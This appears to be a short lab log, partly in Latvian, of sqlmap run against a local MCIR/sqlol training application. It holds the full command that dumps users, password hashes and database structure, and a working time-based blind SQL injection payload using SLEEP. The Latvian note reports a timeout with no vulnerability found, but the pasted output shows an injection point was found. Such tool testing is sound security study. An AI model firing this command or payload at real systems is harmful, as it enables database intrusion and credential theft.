=================================================================================
0. Palaistā komanda
sqlmap -u 
"http://localhost/MCIR/sqlol/select.php?sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=bool&error_level=none&show_query=on&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --users -passwords --privileges --roles --dbs --tables --columns --risk=1 --level=1

1. Jautājumi, kurus uzdeva SQLMap
1.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
1.2. for the remaining tests, do you want to include all tests for MySQL extending provided level (1) and risk (1) values? [Y/n] n
1.3. GET parameter 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
1.4. do you want to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y

2. 
Testpiemērs iesākts plkst 18:23:41, līdz 4. jautājumam nonācām plkst 18:24:26, līdz 18:30:00 netika konsolē izprintēts neviens ziņojums, tātad uzskatām, ka pārsniegts 5 min limits un vājības netika atrastas.

=================================================================================
sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=bool&error_level=none&show_query=on&inject_string=test' AND (SELECT 2487 FROM (SELECT(SLEEP(5)))dsyZ) AND 'PKiI'='PKiI&location=where_string&submit=Inject!
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12
